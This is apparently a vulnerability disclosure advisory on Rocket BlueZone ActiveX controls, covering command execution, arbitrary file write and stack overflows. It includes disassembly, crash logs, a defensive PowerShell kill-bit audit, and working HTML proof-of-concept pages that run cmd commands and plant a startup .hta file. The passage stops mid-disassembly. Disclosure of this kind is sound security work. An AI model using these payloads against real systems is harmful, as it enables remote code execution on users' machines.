SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.
Introduction
Rocket BlueZone Terminal Emulation Suite is the solution you need if you are looking to replace your aging, expensive, current Terminal Emulation solution. Our software is a secure, slim, powerhouse of a solution built for the IBM Mainframe (TN3270), i Series (TN5250), UNIX/DEC (VT), Unisys (T27 & UTS) and secure File Transfer Protocol (FTP) systems.
Vulnerability Details
Multiple vulnerabilities have been found in Rocket BlueZone:
- WhllObj ActiveX Control Run Method Command Execution
- WhllObj ActiveX Control Shell Method Command Execution
- LIPI ActiveX Control SaveSettings Method Code Execution
- WhllObj ActiveX Control StatusBarText Property Stack Buffer Overflow Vulnerability
- WhllObj ActiveX Control GetOpenFilename Method FileFilter Stack Buffer Overflow Vulnerability
- WhllObj ActiveX Control GetSaveAsFilename Method FileFilter Stack Buffer Overflow Vulnerability
- LIPI ActiveX Control SendFile Method Heap Buffer Overflow Vulnerability
- LIPI ActiveX Control ReceiveFile Method Heap Buffer Overflow Vulnerability
WhllObj ActiveX Control Run Method Command Execution
BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripts to call the methods and properties of the object, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
This ActiveX control offers the insecure Run() method, see typelib:
...
/* DISPID=17 */
/* VT_INT [22] */
function Run(
    /* VT_BSTR [8] [in] */ $CmdLine
)
{
    /* method Run */
}
...
The ActiveX control passes the user-supplied command line straight to CreateProcessA(). The attached proof of concept launches calc.exe.
Call stack of thread 000042E8
Address   Returns to  Procedure / arguments                    Called from          Frame      Stack Dump
015ED028  03044ABB    kernel32.CreateProcessA                  bzwhll.03044AB5      015ED0AC
015ED02C  00000000      ModuleFileName = NULL
015ED030  015ED0CC      CommandLine = "cmd /c start calc"
015ED034  00000000      pProcessSecurity = NULL
015ED038  00000000      pThreadSecurity = NULL
015ED03C  00000000      InheritHandles = FALSE
015ED040  00000000      CreationFlags = 0
015ED044  00000000      pEnvironment = NULL
015ED048  00000000      CurrentDir = NULL
015ED04C  015ED058      pStartupInfo = 015ED058
015ED050  015ED09C      pProcessInfo = 015ED09C
015ED0B0  03059CA0    ? bzwhll.03044A8E                        bzwhll.03059C9B      015ED1D8
015ED1D8  77135CF9    Includes bzwhll.03059CA0                 OLEAUT32.77135CF7    015ED1D4   03200048 003DEEB
015ED1F8  77136308    ? OLEAUT32.DispCallFunc                  OLEAUT32.77136303    015ED1F4   03200048 0000005
015ED288  03042493    Includes OLEAUT32.77136308               bzwhll.03042490      015ED284   02D3E324 0320004
015ED2B4  3C61302B    Includes bzwhll.03042493                 mshtml.3C613028      015ED2B0   03200048 0000001
015ED2F0  3C956B7D    mshtml.3C612FEE                          mshtml.3C956B78      015ED2EC   03200048 0000001
015ED320  3C95350A    mshtml.3C956A4B                          mshtml.3C953505      015ED31C   80020003 0000001
015ED34C  3C5FA571    Includes mshtml.3C95350A                 mshtml.3C5FA56E      015ED348   02B10400 0000001
015ED39C  3D7C3A8A    Includes mshtml.3C5FA571                 3D7C3A88             015ED398   02D64860 0000001
015ED3DC  3D7C39D6    3D7C39FC                                 3D7C39D1             015ED3D8   003DC708 0000001
015ED418  3D7C4F16    3D7C3987                                 3D7C4F11             015ED414   003DC708 0000040
015ED4D8  3D7C4E70    ? 3D7C4E7E                               3D7C4E6B             015ED4D4   00000011 0000000
015ED50C  3D7C2D5D    3D7C244D                                 3D7C2D58             015ED508   003DC708 015ED53
015ED558  3D7C4225    3D7C2CEA                                 3D7C4220             015ED554   003DC708 0000000
015ED588  3D7C4F83    3D7C22E8                                 3D7C4F7E             015ED584   003DC708 0000000
015ED724  3D7C139B    3D7C0DC6                                 3D7C1396             015ED720   015ED738 015ED88
015ED80C  3D7C12D5    3D7C12FC                                 3D7C12D0             015ED808   015ED880 0000000
015ED858  3D7C1103    Includes 3D7C12D5                        3D7C1101             015ED854   015ED880 0000000
015ED8D4  3D7A3EA3    3D7C0FB9                                 3D7A3E9E             015ED8D0   003DDF60 015EDA9
015ED920  3D7A553F    ? 3D7A3D03                               3D7A553A             015ED91C   003DC3F0 015EDA9
015ED984  3D7A534D    3D7A5356                                 3D7A5348             015ED980   003DC3F0 001DD2E
015ED9AC  3C53A47F    Includes 3D7A534D                        mshtml.3C53A47C      015ED9A8   003DC3F4 0024EB7
015EDA04  3C53A1F1    mshtml.3C53A2F0                          mshtml.3C53A1EC      015EDA00   02B250A0 0000000
015EDAC8  3C53A612    ? mshtml.3C53A233                        mshtml.3C53A60D      015EDAC4

vulnerable code, bzwhll.dll:
;----------------------------------------------------------------------------------------------------
10004A8E SUB_L10004A8E:
10004A8E 55             push ebp
10004A8F 8BEC           mov ebp,esp
10004A91 83EC54         sub esp,00000054h
10004A94 56             push esi
10004A95 8D45AC         lea eax,[ebp-54h]
10004A98 50             push eax
10004A99 33F6           xor esi,esi
10004A9B FF1570300310   call [KERNEL32.dll!GetStartupInfoA]
10004AA1 8D45F0         lea eax,[ebp-10h]
10004AA4 50             push eax
10004AA5 8D45AC         lea eax,[ebp-54h]
10004AA8 50             push eax
10004AA9 FF7508         push [ebp+08h]
10004AAC 56             push esi
10004AAD 56             push esi
10004AAE 56             push esi
10004AAF 56             push esi
10004AB0 56             push esi
10004AB1 FF750C         push [ebp+0Ch]
10004AB4 56             push esi
10004AB5 FF156C300310   call [KERNEL32.dll!CreateProcessA]   //boom
10004ABB 85C0           test eax,eax
10004ABD 740E           jz L10004ACD
10004ABF 8B75FC         mov esi,[ebp-04h]
10004AC2 6AFF           push FFFFFFFFh
10004AC4 FF75F0         push [ebp-10h]
10004AC7 FF1528330310   call [USER32.dll!WaitForInputIdle]
10004ACD L10004ACD:
10004ACD 8BC6           mov eax,esi
10004ACF 5E             pop esi
10004AD0 C9             leave
10004AD1 C3             retn
;----------------------------------------------------------------------------------------------------
Proof of Concept
<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
obj.Run("cmd /c start calc");
</script>
WhllObj ActiveX Control Shell Method Command Execution
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripts to call the methods and properties of the object, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
This ActiveX control offers the insecure Shell() method, see typelib:
...
/* DISPID=106 */
/* VT_INT [22] */
function Shell(
    /* VT_BSTR [8] [in] */ $Application,
    /* VT_VARIANT [12] [in] */ $CommandLine,
    /* VT_VARIANT [12] [in] */ $WindowState,
    /* VT_VARIANT [12] [in] */ $Wait
)
{
    /* method Shell */
}
...
The ActiveX control passes the user-supplied application and command line to CreateProcessA(). The attached proof of concept launches calc.exe.
Call stack of thread 000041C4
Address   Returns to  Procedure / arguments                                   Called from        Frame
015EAC2C  030F8215    kernel32.CreateProcessA                                 bzwhll.030F820F    015EACE4
015EAC30  00000000      ModuleFileName = NULL
015EAC34  015EAD1C      CommandLine = ""d:\windows\system32\cmd.exe" /c start calc"
015EAC38  00000000      pProcessSecurity = NULL
015EAC3C  00000000      pThreadSecurity = NULL
015EAC40  00000000      InheritHandles = FALSE
015EAC44  00000000      CreationFlags = 0
015EAC48  00000000      pEnvironment = NULL
015EAC4C  00000000      CurrentDir = NULL
015EAC50  015EAC64      pStartupInfo = 015EAC64
015EAC54  015EACA8      pProcessInfo = 015EACA8

vulnerable code, bzwhll.dll:
;----------------------------------------------------------------------------------------------------
10028059 L10028059:
10028059 55               db 55h; 'U'
1002805A 8D               db 8Dh; '?'
1002805B AC               db ACh; '¿'
1002805C 24               db 24h; '$'
1002805D 40               db 40h; '@'
1002805E DB               db DBh; '›'
1002805F FF               db FFh; 'ï'
10028060 FF               db FFh; 'ï'
10028061 B8               db B8h; 'ñ'
10028062 40               db 40h; '@'
10028063 25               db 25h; '%'
10028064 00               db 00h;
10028065 00               db 00h;
10028066 E8               db E8h; '¨'
10028067 F5               db F5h; 'å'
10028068 8B               db 8Bh; '<'
10028069 00               db 00h;
1002806A 00               db 00h;
1002806B A1               db A1h; 'ö'
1002806C F4EC0410         dd L1004ECF4
10028070 33               db 33h; '3'
10028071 C5               db C5h; '…'
10028072 89               db 89h; '%'
10028073 85               db 85h; ':'
10028074 BC               db BCh; '?'
10028075 24               db 24h; '$'
10028076 00               db 00h;
10028077 00               db 00h;
10028078 53               push ebx
10028079 56               push esi
1002807A 57               push edi
1002807B 8DB5E0240000     lea esi,[ebp+000024E0h]
10028081 8D7D10           lea edi,[ebp+10h]
10028084 A5               movsd
10028085 A5               movsd
10028086 A5               movsd
10028087 8B85CC240000     mov eax,[ebp+000024CCh]
1002808D 8B9DC8240000     mov ebx,[ebp+000024C8h]
10028093 A5               movsd
10028094 8DB5F0240000     lea esi,[ebp+000024F0h]
1002809A 8D7D28           lea edi,[ebp+28h]
1002809D A5               movsd
1002809E A5               movsd
1002809F A5               movsd
100280A0 A5               movsd
100280A1 8BBD00250000     mov edi,[ebp+00002500h]
100280A7 33F6             xor esi,esi
100280A9 3935A4F50410     cmp [L1004F5A4],esi
100280AF 894524           mov [ebp+24h],eax
100280B2 897D20           mov [ebp+20h],edi
100280B5 740D             jz L100280C4
100280B7 53               push ebx
100280B8 68C8EA0310       push SSZ1003EAC8_WhllObj__Shell_____
100280BD E895B4FEFF       call SUB_L10013557
100280C2 59               pop ecx
100280C3 59               pop ecx
100280C4 L100280C4:
100280C4 8D4580           lea eax,[ebp-80h]
100280C7 50               push eax
100280C8 C685B823000000   mov byte ptr [ebp+000023B8h],00h
100280CF C685C013000000   mov byte ptr [ebp+000013C0h],00h
100280D6 FF1570300310     call [KERNEL32.dll!GetStartupInfoA]
100280DC 56               push esi
100280DD 56               push esi
100280DE 6804010000       push 00000104h
100280E3 8D85B8230000     lea eax,[ebp+000023B8h]
100280E9 50               push eax
100280EA 6AFF             push FFFFFFFFh
100280EC FF7524           push [ebp+24h]
100280EF 56               push esi
100280F0 56               push esi
100280F1 FF156C310310     call [KERNEL32.dll!WideCharToMultiByte]
100280F7 83F801           cmp eax,00000001h
100280FA 7F10             jg L1002810C
100280FC 6A02             push 00000002h
100280FE 58               pop eax
100280FF 8983F7050000     mov [ebx+000005F7h],eax
10028105 8907             mov [edi],eax
10028107 E99F010000       jmp L100282AB
1002810C L1002810C:
1002810C 8D85D0240000     lea eax,[ebp+000024D0h]
10028112 50               push eax
10028113 E8A0B7FEFF       call SUB_L100138B8
10028118 84C0             test al,al
1002811A 59               pop ecx
1002811B 7422             jz L1002813F
1002811D 68F60F0000       push 00000FF6h
10028122 8D85C0130000     lea eax,[ebp+000013C0h]
10028128 50               push eax
10028129 8D85D0240000     lea eax,[ebp+000024D0h]
1002812F 50               push eax
10028130 C685C013000000   mov byte ptr [ebp+000013C0h],00h
10028137 E897B5FEFF       call SUB_L100136D3
1002813C 83C40C           add esp,0000000Ch
1002813F L1002813F:
1002813F 66837D100A       cmp word ptr [ebp+10h],000Ah
10028144 7420             jz L10028166
10028146 66F745100040     test word ptr [ebp+10h],4000h
1002814C 7407             jz L10028155
1002814E 8B4518           mov eax,[ebp+18h]
10028151 8A00             mov al,[eax]
10028153 EB03             jmp L10028158
10028155 L10028155:
10028155 8A4518           mov al,[ebp+18h]
10028158 L10028158:
10028158 FEC0             inc al
1002815A 834DAC01         or dword ptr [ebp-54h],00000001h
1002815E 660FB6C0         movzx ax,al
10028162 668945B0         mov [ebp-50h],ax
10028166 L10028166:
10028166 685CE60310       push L1003E65C
1002816B 8D4538           lea eax,[ebp+38h]
1002816E 50               push eax
1002816F FF155C300310     call [KERNEL32.dll!lstrcpyA]
10028175 8B3D60300310     mov edi,[KERNEL32.dll!lstrcatA]
1002817B 8D85B8230000     lea eax,[ebp+000023B8h]
10028181 50               push eax
10028182 8D4538           lea eax,[ebp+38h]
10028185 50               push eax
10028186 FFD7             call edi
10028188 685CE60310       push L1003E65C
1002818D 8D4538           lea eax,[ebp+38h]
10028190 50               push eax
10028191 FFD7             call edi
10028193 80BDC013000000   cmp byte ptr [ebp+000013C0h],00h
1002819A 7418             jz L100281B4
1002819C 6868850310       push L10038568
100281A1 8D4538           lea eax,[ebp+38h]
100281A4 50               push eax
100281A5 FFD7             call edi
100281A7 8D85C0130000     lea eax,[ebp+000013C0h]
100281AD 50               push eax
100281AE 8D4538           lea eax,[ebp+38h]
100281B1 50               push eax
100281B2 FFD7             call edi
100281B4 L100281B4:
100281B4 8D4538           lea eax,[ebp+38h]
100281B7 8945E4           mov [ebp-1Ch],eax
100281BA 8D45D4           lea eax,[ebp-2Ch]
100281BD 50               push eax
100281BE C745D43C000000   mov dword ptr [ebp-2Ch],0000003Ch
100281C5 C745D840050000   mov dword ptr [ebp-28h],00000540h
100281CC 8975DC           mov [ebp-24h],esi
100281CF C745E0C0EA0310   mov dword ptr [ebp-20h],SSZ1003EAC0_Open
100281D6 8975E8           mov [ebp-18h],esi
100281D9 8975EC           mov [ebp-14h],esi
100281DC C745F001000000   mov dword ptr [ebp-10h],00000001h
100281E3 FF15C0320310     call [SHELL32.dll!ShellExecuteExA]
100281E9 8B7D20           mov edi,[ebp+20h]
100281EC 8983F7050000     mov [ebx+000005F7h],eax
100281F2 8907             mov [edi],eax
100281F4 39B3F7050000     cmp [ebx+000005F7h],esi
100281FA 756F             jnz L1002826B
100281FC 8D45C4           lea eax,[ebp-3Ch]
100281FF 50               push eax
10028200 8D4580           lea eax,[ebp-80h]
10028203 50               push eax
10028204 56               push esi
10028205 56               push esi
10028206 56               push esi
10028207 56               push esi
10028208 56               push esi
10028209 56               push esi
1002820A 8D4538           lea eax,[ebp+38h]
1002820D 50               push eax
1002820E 56               push esi
1002820F FF156C300310     call [KERNEL32.dll!CreateProcessA]   //boom
10028215 8983F7050000     mov [ebx+000005F7h],eax
1002821B 8907             mov [edi],eax
1002821D 39B3F7050000     cmp [ebx+000005F7h],esi
10028223 0F8482000000     jz L100282AB
10028229 66837D280A       cmp word ptr [ebp+28h],000Ah
1002822E 747B             jz L100282AB
10028230 66F745280040     test word ptr [ebp+28h],4000h
10028236 7407             jz L1002823F
10028238 8B4530           mov eax,[ebp+30h]
1002823B 8A00             mov al,[eax]
1002823D EB03             jmp L10028242
1002823F L1002823F:
1002823F 8A4530           mov al,[ebp+30h]
10028242 L10028242:
10028242 84C0             test al,al
10028244 7465             jz L100282AB
10028246 EB18             jmp L10028260
10028248 L10028248:
10028248 6A64             push 00000064h
1002824A FF75C4           push [ebp-3Ch]
1002824D FF1508310310     call [KERNEL32.dll!WaitForSingleObject]
10028253 85C0             test eax,eax
10028255 7454             jz L100282AB
10028257 6A01             push 00000001h
10028259 8BCB             mov ecx,ebx
1002825B E848EBFFFF       call SUB_L10026DA8
10028260 L10028260:
10028260 80BB8656000000   cmp byte ptr [ebx+00005686h],00h
10028267 74DF             jz L10028248
10028269 EB40             jmp L100282AB
1002826B L1002826B:
1002826B 66837D280A       cmp word ptr [ebp+28h],000Ah
10028270 7439             jz L100282AB
10028272 66F745280040     test word ptr [ebp+28h],4000h
10028278 7407             jz L10028281
1002827A 8B4530           mov eax,[ebp+30h]
1002827D 8A00             mov al,[eax]
1002827F EB03             jmp L10028284
10028281 L10028281:
10028281 8A4530           mov al,[ebp+30h]
10028284 L10028284:
10028284 84C0             test al,al
10028286 7423             jz L100282AB
10028288 EB18             jmp L100282A2
1002828A L1002828A:
1002828A 6A64             push 00000064h
1002828C FF750C           push [ebp+0Ch]
1002828F FF1508310310     call [KERNEL32.dll!WaitForSingleObject]
10028295 85C0             test eax,eax
10028297 7412             jz L100282AB
10028299 6A01             push 00000001h
1002829B 8BCB             mov ecx,ebx
1002829D E806EBFFFF       call SUB_L10026DA8
100282A2 L100282A2:
100282A2 80BB8656000000   cmp byte ptr [ebx+00005686h],00h
100282A9 74DF             jz L1002828A
100282AB L100282AB:
100282AB 8B8DBC240000     mov ecx,[ebp+000024BCh]
100282B1 5F               pop edi
100282B2 5E               pop esi
100282B3 33CD             xor ecx,ebp
100282B5 33C0             xor eax,eax
100282B7 5B               pop ebx
100282B8 E88F890000       call SUB_L10030C4C
100282BD 81C5C0240000     add ebp,000024C0h
100282C3 C9               leave
100282C4 C23C00           retn 003Ch
;----------------------------------------------------------------------------------------------------
Proof of Concept
<HTML>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
obj.Shell("c:\\windows\\system32\\cmd.exe"," /c start calc",1,1);
</script>
LIPI ActiveX Control SaveSettings Method Code Execution
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: LIPI Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripts to call the methods and properties of the object, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
This ActiveX control offers the insecure SaveSettings() method, see typelib:
...
/* DISPID=4 */
/* VT_I4 [3] */
function SaveSettings(
    /* VT_BSTR [8] [in] */ $__MIDL_0019
)
{
    /* method SaveSettings */
}
...
This method simply accepts a file name as its argument and can be used to write arbitrary files to the target computer. Directory traversal sequences are also accepted. The file content can be controlled by setting the 'Username' property.
Given this, a remote attacker could store an executable .hta file inside an automatic startup folder. The attached proof of concept launches calc.exe when the computer reboots.
Proof of Concept
<html>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<script>
obj.Username = ">>>>>>>>>>>>>>><sc" + "ript>var x=new ActiveXObject(\"WScript.Shell\");x.Exec(\"calc.exe\");</sc" + "ript>";
obj.SaveSettings("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta");
</script>
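Every vulnerability in this advisory is reachable only because Internet Explorer treats the two BlueZone controls as safe for scripting. The following PowerShell audit is an added example written for this page, not code from SSD or from Rocket Software: it looks up the WhllObj and LIPI CLSIDs given above, reports whether each is registered, whether it declares itself safe through the registry component categories, and whether the IE kill bit is set, and with -SetKillBit it sets that bit so IE will no longer instantiate the controls. The category GUIDs and the 0x400 Compatibility Flags bit are standard Windows values; the function names are this example's own.

```powershell
# Added example for this advisory (not SSD's or Rocket Software's code): audits the
# BlueZone CLSIDs named above and, with -SetKillBit, blocks them in Internet Explorer
# through the ActiveX Compatibility kill bit. Run from an elevated PowerShell prompt.
[CmdletBinding()]
param(
    [switch]$SetKillBit
)

# CLSIDs and descriptions taken from the advisory text.
$BlueZoneControls = [ordered]@{
    '{4EB961C3-00D0-11D5-903D-00105AABADD3}' = 'BZWhll.WhllObj.6.1 (bzwhll.dll)'
    '{0EB961C3-A2D0-11D5-903D-10105AABADD3}' = 'BlueZone.LIPI.6.1 (bzlipiobj.dll)'
}

# Component categories a control may register to declare itself safe. A control that
# answers IObjectSafety in code instead (as the advisory reports for BlueZone) never
# writes these keys, so their absence must not be read as "not scriptable".
$CatSafeForScripting      = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatSafeForInitialization = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
$KillBitFlag              = 0x400   # Compatibility Flags bit IE checks before loading a control

# 32-bit controls on 64-bit Windows live under the Wow6432Node views; check both.
$ClsidRoots  = @('HKLM:\SOFTWARE\Classes\CLSID', 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID')
$CompatRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-ApplicableCompatRoots {
    # Drop the Wow6432Node view on 32-bit Windows, where its parent key does not exist.
    $CompatRoots | Where-Object { Test-Path (Split-Path $_ -Parent) }
}

function Get-CompatFlags {
    param([string]$Key)
    (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
}

function Get-ActiveXControlStatus {
    param([string]$Clsid, [string]$Label)

    $clsidKey = $ClsidRoots |
        ForEach-Object { Join-Path $_ $Clsid } |
        Where-Object { Test-Path $_ } |
        Select-Object -First 1
    $server = $null
    if ($clsidKey) {
        $server = (Get-ItemProperty -Path (Join-Path $clsidKey 'InprocServer32') -ErrorAction SilentlyContinue).'(default)'
    }
    $catBase = if ($clsidKey) { Join-Path $clsidKey 'Implemented Categories' }

    # The kill bit counts as set only when every view IE may consult carries it.
    $roots = @(Get-ApplicableCompatRoots)
    $killBitEverywhere = ($roots.Count -gt 0)
    foreach ($root in $roots) {
        $flags = Get-CompatFlags -Key (Join-Path $root $Clsid)
        if ($null -eq $flags -or (($flags -band $KillBitFlag) -eq 0)) { $killBitEverywhere = $false }
    }

    [pscustomobject]@{
        Clsid            = $Clsid
        Control          = $Label
        Registered       = [bool]$clsidKey
        ServerPath       = $server
        RegSafeScripting = [bool]($catBase -and (Test-Path (Join-Path $catBase $CatSafeForScripting)))
        RegSafeInit      = [bool]($catBase -and (Test-Path (Join-Path $catBase $CatSafeForInitialization)))
        KillBitSet       = $killBitEverywhere
    }
}

function Set-ActiveXKillBit {
    param([string]$Clsid)
    foreach ($root in Get-ApplicableCompatRoots) {
        $key = Join-Path $root $Clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $current = Get-CompatFlags -Key $key
        $new = ([int]$current) -bor $KillBitFlag   # preserve any flags already present
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

foreach ($entry in $BlueZoneControls.GetEnumerator()) {
    $status = Get-ActiveXControlStatus -Clsid $entry.Key -Label $entry.Value
    $status | Format-List
    if ($SetKillBit -and -not $status.KillBitSet) {
        Set-ActiveXKillBit -Clsid $entry.Key
        Write-Host "Kill bit set for $($entry.Key) ($($entry.Value))"
    }
}
```

The kill bit only affects Internet Explorer and other hosts that honour the ActiveX Compatibility key; it does not remove the DLLs, so the BlueZone application itself keeps working.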
WhllObj ActiveX Control StatusBarText Property Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripts to call the methods and properties of the object, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The ActiveX control offers the StatusBarText property, see typelib:
...
/* DISPID=154 */
/* VT_BSTR [8] */
/* property StatusBarText */
var $StatusBarText;

/* DISPID=154 */
/* property StatusBarText */
var $StatusBarText;
...
This property suffers from a stack-based buffer overflow because of a copy loop inside bzwhll.dll. See the vulnerable code below.
WinDBG shows:

(6320.66b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02ca6a64 ebx=00002f0c ecx=00000041 edx=00000074 esi=7c813e21 edi=03550048
eip=0273e548 esp=015ecdd4 ebp=015ed1f8 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
bzwhll!DllGetClassObject+0x12a8d:
0273e548 888c1dfcfeffff  mov     byte ptr [ebp+ebx-104h],cl ss:0023:015f0000=4d
0:008> g
(6320.66b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015eca04 ebp=015eca24 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???

vulnerable code, bzwhll.dll
;----------------------------------------------------------------------------------------------------
1001E379 L1001E379:
1001E379 55               push ebp
1001E37A 8BEC             mov ebp,esp
1001E37C 81EC18040000     sub esp,00000418h
1001E382 A1F4EC0410       mov eax,[L1004ECF4]
1001E387 33C5             xor eax,ebp
1001E389 8945FC           mov [ebp-04h],eax
1001E38C 53               push ebx
1001E38D 56               push esi
1001E38E 33DB             xor ebx,ebx
1001E390 391DA4F50410     cmp [L1004F5A4],ebx
1001E396 57               push edi
1001E397 8B7D08           mov edi,[ebp+08h]
1001E39A 740D             jz L1001E3A9
1001E39C 57               push edi
1001E39D 6820C10310       push SSZ1003C120_WhllObj__put_StatusBarText_____
1001E3A2 E8B051FFFF       call SUB_L10013557
1001E3A7 59               pop ecx
1001E3A8 59               pop ecx
1001E3A9 L1001E3A9:
1001E3A9 6800010000       push 00000100h
1001E3AE 8D85FCFEFFFF     lea eax,[ebp-00000104h]
1001E3B4 53               push ebx
1001E3B5 50               push eax
1001E3B6 E8D1280100       call jmp_MSVCR80.dll!memset
1001E3BB 8B450C           mov eax,[ebp+0Ch]
1001E3BE 83C40C           add esp,0000000Ch
1001E3C1 663918           cmp [eax],bx
1001E3C4 0F8492010000     jz L1001E55C
1001E3CA 8B3560300310     mov esi,[KERNEL32.dll!lstrcatA]
1001E3D0 L1001E3D0:
1001E3D0 66833826         cmp word ptr [eax],0026h         \ //scan for ampersand
1001E3D4 0F856C010000     jnz L1001E546                    /
1001E3DA 83C002           add eax,00000002h
1001E3DD 8985F8FBFFFF     mov [ebp-00000408h],eax
1001E3E3 0FB700           movzx eax,[eax]
1001E3E6 83F86F           cmp eax,0000006Fh
1001E3E9 0F8FE7000000     jg L1001E4D6
1001E3EF 0F84D3000000     jz L1001E4C8
1001E3F5 83E826           sub eax,00000026h
1001E3F8 0F84C3000000     jz L1001E4C1
1001E3FE 83E83D           sub eax,0000003Dh
1001E401 0F849D000000     jz L1001E4A4
1001E407 48               dec eax
1001E408 7463             jz L1001E46D
1001E40A 48               dec eax
1001E40B 48               dec eax
1001E40C 7430             jz L1001E43E
1001E40E 48               dec eax
1001E40F 48               dec eax
1001E410 7412             jz L1001E424
1001E412 83E804           sub eax,00000004h
1001E415 0F8514010000     jnz L1001E52F
1001E41B L1001E41B:
1001E41B 8D477B           lea eax,[edi+7Bh]
1001E41E L1001E41E:
1001E41E 50               push eax
1001E41F E902010000       jmp L1001E526
1001E424 L1001E424:
1001E424 8D8DFCFDFFFF     lea ecx,[ebp-00000204h]
1001E42A 51               push ecx
1001E42B 6A05             push 00000005h
1001E42D L1001E42D:
1001E42D 8B07             mov eax,[edi]
1001E42F 57               push edi
1001E430 FF907C070000     call [eax+0000077Ch]
1001E436 L1001E436:
1001E436 8D85FCFDFFFF     lea eax,[ebp-00000204h]
1001E43C EBE0             jmp L1001E41E
1001E43E L1001E43E:
1001E43E 8B07             mov eax,[edi]
1001E440 8D8DFCFDFFFF     lea ecx,[ebp-00000204h]
1001E446 51               push ecx
1001E447 6A08             push 00000008h
1001E449 57               push edi
1001E44A FF907C070000     call [eax+0000077Ch]
1001E450 80BDFCFDFFFF00   cmp byte ptr [ebp-00000204h],00h
1001E457 75DD             jnz L1001E436
1001E459 6814C10310       push SSZ1003C114_Untitled
1001E45E 8D85FCFDFFFF     lea eax,[ebp-00000204h]
1001E464 50               push eax
1001E465 FF155C300310     call [KERNEL32.dll!lstrcpyA]
1001E46B EBC9             jmp L1001E436
1001E46D L1001E46D:
1001E46D 8D85E8FBFFFF     lea eax,[ebp-00000418h]
1001E473 50               push eax
1001E474 FF15A8300310     call [KERNEL32.dll!GetLocalTime]
1001E47A 6800010000       push 00000100h
1001E47F 8D85FCFDFFFF     lea eax,[ebp-00000204h]
1001E485 50               push eax
1001E486 6800C10310       push SSZ1003C100_ddd__MMM_dd_yyyy
1001E48B 8D85E8FBFFFF     lea eax,[ebp-00000418h]
1001E491 50               push eax
1001E492 6800000040       push 40000000h
1001E497 6800040000       push 00000400h
1001E49C FF15EC300310     call [KERNEL32.dll!GetTimeFormatA]
1001E4A2 EB92             jmp L1001E436
1001E4A4 L1001E4A4:
1001E4A4 80BFC605000000   cmp byte ptr [edi+000005C6h],00h
1001E4AB 8D85FCFEFFFF     lea eax,[ebp-00000104h]
1001E4B1 7407             jz L1001E4BA
1001E4B3 68F4C00310       push SSZ1003C0F4_Connected
1001E4B8 EB72             jmp L1001E52C
1001E4BA L1001E4BA:
1001E4BA 68E4C00310       push SSZ1003C0E4_Disconnected
1001E4BF EB6B             jmp L1001E52C
1001E4C1 L1001E4C1:
1001E4C1 68E0C00310       push L1003C0E0
1001E4C6 EB5E             jmp L1001E526
1001E4C8 L1001E4C8:
1001E4C8 8D8DFCFDFFFF     lea ecx,[ebp-00000204h]
1001E4CE 51               push ecx
1001E4CF 6A08             push 00000008h
